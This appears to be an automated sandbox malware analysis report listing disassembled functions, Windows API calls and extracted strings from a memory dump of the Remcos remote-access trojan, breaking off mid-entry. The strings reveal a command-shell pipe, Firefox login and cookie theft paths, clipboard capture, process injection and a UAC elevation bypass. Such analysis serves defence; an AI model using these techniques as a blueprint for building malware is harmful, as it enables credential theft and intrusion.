                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                                                          • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                                            • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                            • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                            • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                            • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                                                          • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                                                                                            • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                          • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                                                          • API String ID: 1067849700-181434739
                                                                                                                          • Opcode ID: 3817d59f13ca8fe8e185b4014e92b89e3ece5399662c1fa5bb97dafb16bc065d
                                                                                                                          • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                                                                          • Opcode Fuzzy Hash: 3817d59f13ca8fe8e185b4014e92b89e3ece5399662c1fa5bb97dafb16bc065d
                                                                                                                          • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                                                                          APIs
                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                                          • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                                                          • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                                          • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                                                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                                                                          • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                                          • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                                          • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                                          • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                                          • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                          • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                                                          • API String ID: 2994406822-18413064
                                                                                                                          • Opcode ID: d16286c7c38df6e2a78898b44b0a418d7ee8de31fdaa2db65b94654e283f2e3b
                                                                                                                          • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                                                                          • Opcode Fuzzy Hash: d16286c7c38df6e2a78898b44b0a418d7ee8de31fdaa2db65b94654e283f2e3b
                                                                                                                          • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                                                                          APIs
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                            • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                                                          • OpenMutexA.KERNEL32 ref: 00412181
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                          • API String ID: 3018269243-13974260
                                                                                                                          • Opcode ID: 2205b3d103f08f6d55fa3a4c0d872f48598f397e46eb09d3558a5a12db7084c4
                                                                                                                          • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                                                          • Opcode Fuzzy Hash: 2205b3d103f08f6d55fa3a4c0d872f48598f397e46eb09d3558a5a12db7084c4
                                                                                                                          • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                          • API String ID: 1164774033-3681987949
                                                                                                                          • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                          • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                                                          • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                          • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                                                          APIs
                                                                                                                          • OpenClipboard.USER32 ref: 004168FD
                                                                                                                          • EmptyClipboard.USER32 ref: 0041690B
                                                                                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                                                          • CloseClipboard.USER32 ref: 00416990
                                                                                                                          • OpenClipboard.USER32 ref: 00416997
                                                                                                                          • GetClipboardData.USER32 ref: 004169A7
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                          • CloseClipboard.USER32 ref: 004169BF
                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                          • String ID: !D@
                                                                                                                          • API String ID: 3520204547-604454484
                                                                                                                          • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                                                          • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                                                          • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                                                          • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$Close$File$FirstNext
                                                                                                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                          • API String ID: 3527384056-432212279
                                                                                                                          • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                          • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                                                          • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                          • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,02x,?,00475338), ref: 0040F4C9
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                          • String ID: 02x$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                                          • API String ID: 3756808967-1362542645
                                                                                                                          • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                                                                          • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                                                                          • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                                                                          • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                                                          APIs
                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 297527592-0
                                                                                                                          • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                          • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                                                          • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                          • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                                                          • API String ID: 0-1861860590
                                                                                                                          • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                                                          • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                                                          • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                                                          • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                                                          APIs
                                                                                                                          • _wcslen.LIBCMT ref: 0040755C
                                                                                                                          • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object_wcslen
                                                                                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                          • API String ID: 240030777-3166923314
                                                                                                                          • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                          • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                                                          • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                          • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                                                          APIs
                                                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                                                          • GetLastError.KERNEL32 ref: 0041A84C
                                                                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3587775597-0
                                                                                                                          • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                          • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                                                          • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                          • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                          • String ID: JD$JD$JD
                                                                                                                          • API String ID: 745075371-3517165026
                                                                                                                          • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                          • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                                                          • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                          • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                          • API String ID: 1164774033-405221262
                                                                                                                          • Opcode ID: fddf014dc9d51464ede12c116fb1a9a1db5591685b143fb650fb6654b978e18b
                                                                                                                          • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                                                          • Opcode Fuzzy Hash: fddf014dc9d51464ede12c116fb1a9a1db5591685b143fb650fb6654b978e18b
                                                                                                                          • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2341273852-0
                                                                                                                          • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                          • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                                                          • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                          • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                          Strings
